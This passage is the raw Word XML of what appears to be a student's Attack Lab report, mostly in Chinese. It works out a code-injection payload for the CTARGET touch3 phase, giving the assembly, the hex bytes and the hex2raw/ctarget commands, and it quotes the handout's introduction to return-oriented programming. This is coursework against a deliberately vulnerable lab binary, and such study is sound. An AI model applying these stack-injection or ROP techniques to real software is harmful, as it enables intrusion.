        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>16 validate(3);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>17 } else {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>18 printf("Misfire: You called touch3(\"%s\")\n", sval);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>19 fail(3);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>20 }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>21 exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>22 }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Your task is to get CTARGET to execute the code for touch3 rather than returning to test. You must make it appear to touch3 as if you have passed a string representation of your cookie as its argument.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第三关touch的参数是cookie的字符串的地址,通过寄存器%rdi来储存cookie的字符串的地址。又因为cookie为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>43e6fb4c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以其ascii码字符串为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>33 65 36 66 62 34 63</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,末尾要加上00表示\n。又因为在hexmatch函数中地址申请，如果字符串储存在栈内会被覆盖，所以必须储存在栈外。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看touch3编译代码，在hexmatch后面设置断点查看栈顶的值：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3418205" cy="2303780"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="16" name="图片 16" descr="JDGGJ`XCOYEKKU99JWCYF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JDGGJ`XCOYEKKU99JWCYF1K"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3418205" cy="230378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3078480" cy="758190"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="17" name="图片 17" descr="_B19T_)T3)GLS4QG(][C}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_B19T_)T3)GLS4QG(][C}1T"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3078480" cy="758190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>得栈顶的值为0x55610560，所以从栈顶+8开始就是栈外，即将字符串储存在0x55610568的位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>又如上图所示，touch3的开始地址是0x401a78，故将字符串地址作为touch3的参数的编译代码是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mov $</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>55610568</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>,%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pushq $</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x401a78</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>retq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>翻译为机器码为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3812540" cy="1439545"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8255"/>
            <wp:docPr id="21" name="图片 21" descr="QYQVJ(DZYT(8U{Q0AZ)S[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YQVJ(DZYT(8U{Q0AZ)S[PS"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3812540" cy="1439545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>故要完成题目要求，要注入的数据为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">48 c7 c7 68 05 61 55 68 78 1a </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>40 00 c3 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>00 00 00 00 48 05 61 55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">00 00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>34 33 65 36 66 62 34 63</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用vi编辑器创建文件“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt”，将该段字符串保存后，使用“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>./hex2raw &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">.txt&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”命令将该字节文本文件转为字符文本文件“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt”保存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">接下来使用命令“./ctarget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">–i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt”将准备好的字符串读入程序中，运行结果如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3183255" cy="521970"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:docPr id="24" name="图片 24" descr="HTX[IZ]4((H3E]VYE516~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X[IZ]4((H3E]VYE516~MV"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3183255" cy="521970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ROP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Performing code-injection attacks on program RTARGET is much more difficult than it is for CTARGET, because it uses two techniques to thwart such attacks:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="426" w:hanging="279" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It uses randomization so that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>the stack positions differ from one run to another</w:t>
      </w:r>
      <w:r>
        <w:t>. This makes it impossible to determine where your injected code will be located.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="426" w:hanging="279" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>marks the section of memory holding the stack as nonexecutable</w:t>
      </w:r>
      <w:r>
        <w:t>, so even if you could set the program counter to the start of your injected code, the program would fail with a segmentation fault.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fortunately, clever people have devised strategies for getting useful things done in a program by executing existing code, rather than injecting new code. The most general form of this is referred to as return-oriented programming (ROP) [1, 2]. The strategy with ROP is to identify byte sequences within an existing program that consist of one or more instructions followed by the instruction ret. Such a segment is referred to as a gadget. Figure 2 illustrates how the stack can be set up to execute a sequence of n gadgets. In this figure, the stack contains a sequence of gadget addresses. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Each gadget consists of a series of instruction bytes, with the final one being 0xc3, encoding the ret instruction</w:t>
      </w:r>
      <w:r>
        <w:t>. When the program executes a ret instruction starting with this configuration, it will initiate a chain of gadget executions, with the ret instruction at the end of each gadget causing the program to jump to the beginning of the next.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5215255" cy="2054225"/>
            <wp:effectExtent l="0" t="0" r="444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5228409" cy="2059498"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>A gadget can make use of code corresponding to assembly-language statements generated by the compiler, especially ones at the ends of functions. In practice, there may be some useful gadgets of this form, but not enough to implement many important operations. For example,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> it is highly unlikely that a compiled function would have popq %rdi as its last instruction before ret</w:t>
      </w:r>
      <w:r>
        <w:t>. Fortunately, with a byte-oriented instruction set, such as x86-64, a gadget can often be found by extracting patterns from other parts of the instruction byte sequence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>For example, one version of rtarget contains code generated for the following C function:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>void setval_210(unsigned *p)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
